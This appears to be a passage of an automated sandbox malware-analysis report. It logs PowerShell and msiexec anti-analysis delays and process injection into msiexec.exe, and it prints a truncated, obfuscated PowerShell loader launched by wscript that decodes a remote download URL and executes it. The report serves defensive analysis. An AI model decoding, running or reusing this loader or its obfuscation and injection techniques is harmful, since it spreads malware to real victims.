                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5428Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4451Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7242Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2354Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8080Thread sleep count: 4762 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 4304Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 4762 delay: -5Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000001.00000002.1906613189.00000211ABE90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7408.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7784, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2E00000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2ADF884Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
